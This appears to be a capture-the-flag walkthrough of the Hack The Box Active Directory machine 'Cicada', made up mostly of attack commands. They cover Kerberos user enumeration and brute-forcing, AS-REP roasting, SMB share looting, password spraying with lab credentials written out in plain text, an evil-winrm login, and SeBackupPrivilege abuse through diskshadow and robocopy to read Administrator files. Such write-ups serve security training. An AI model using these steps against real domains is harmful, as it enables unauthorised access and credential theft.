-
The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.
nmap -p- --open -vvv --min-rate 5000 -Pn -sS 10.10.11.35 -oG scan
/opt/extractports scan
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,51656 -sCV 10.10.11.35 -oN ports
-
I found the domain cicada.htb and add it to the file in the /etc/hosts file
-
By using a null session I manage to enumerate the users of the system. Valid if they really exist with kerbrute.
impacket-lookupsid cicada@10.10.10.35 -no-pass
-
Validate the existence of users in the AD witch kerbrute
./kerbrute_linux_386 userenum --dc 10.10.11.35 -d cicada.htb -t 100 /home/rufo/users
-
I try with a brute force attack to get the passwords of the users but I get nothing.
crackmapexec smb 10.10.11.35 -u emily.oscars -p /usr/share/wordlist/rockyou.txt -k
./kerbrute_linux_386 bruteuser --dc 10.10.11.35 -d cicada.htb -t 100 -v /usr/share/wordlist/rockyou.txt Guest
-
Having a list of valid users we can make an ASREPRoast Attack (without having passwords)
- If the user does not require kerberos preauthentication (if Dont require preauth is set for the user) it will give us a TGT, we can try to break that hash and get the password in clear text.
- But I see that no user has this option set.
impacket-GetNPUsers -no-pass -userfile /home/rufo/users cicada.htb/
-
As I see port 53 open, I try to enumerate server names, mail server names and even perform a zone transfer attack but I get nothing relevant
dig @10.10.11.35 cicada.htb ns
dig @10.10.11.35 cicada.htb mx
dig @10.10.11.35 cicada.htb axfr
-
Making use of a null session I list the resources shared by smb and I find a folder that catches my attention, HR
enum4linux -a -u "guest" -p '' 10.10.11.35
smbmap -H 10.10.11.35 -u 'guest' -r HR
-
I find a file containing a possible password. Valid if it belongs to one of the users previously found.
smbmap -H 10.10.11.35 -u 'guest' --download 'HR/Notice from HR.txt'
crackmapexec smb 10.10.11.35 -u ./users2 -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success
-
Following the found file I try to log in as the user michael.wrightson and the default password to try to change his password but I don’t have permissions.
smbpasswd -r cicada.htb -U michael.wrightson
net rpc password "michael.wrightson" -U "cicada.htb"/"michael.wrightson"%'Cicada$M6Corpb*@Lp#nZp!8' -S 10.10.11.35
-
Having the credentials of the user michael.wrightson, I list resources shared by smb for this user
crackmapexec smb 10.10.10.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
-
After entering the different folders and files I get nothing relevant. I use enum4linux again with the credentials of the found user and find a possible password in the description of a user and see that the user emily.oscars belongs to the Remote Management Users group.
enum4linux -a -u "michael.wrightson" -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35
-
I list shared resources, find a file and download it to see its content.
crackmapexec smb 10.10.11.35 -u david.orelious -p 'Cicada$M6Corpb*@Lp#nZp!8' --shares
smbclient -U 'david.orelious' //10.10.11.35/DEV
-
I find the password of the user emily.oscars, I validate it with crackmapexec and it is correct. As we have seen before that this user belongs to the Remote Management Users group, we can connect with evil-winrm and we can read the first flag.
evil-wirm -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35
-
Using neo4j, bloodhound and bloodhound-python I can extract information from the system to see a way to escalate privileges.
-
While I list the privileges I have and I see that I have the SeBackupPrivilege permission.
-
When searching for information about this privilege I see that I can access all files on the system regardless of permissions.
-
Thanks to this we could read both the system and the sam and try to get the hash of the users but as the connection against the computer was restarted every few minutes, I did not have time to download the files to my local
-
Because of this, I decide to read directly the root.txt file
-
I create a file test.txt with the following content and using diskshadow I run the script that creates a new volume ‘v’ with the content of ‘c’.
set context persistent nowriters
add volume c: alias rufo
create
expose %rufo% v:
diskshadow.exe /s c:\\Temp\\test.txt
-
Now using robocopy, since copy does not let me, I make a copy of any file called root.txt that is in the path v:\UsersAdministrator\Desktop and create it in the current directory, for that I indicate the ‘.’. Thanks to this I already have the content of the root.txt file
cd c:\\Temp
robocopy /b v:\\Users\\Administrator\\Desktop\\ . root.txt
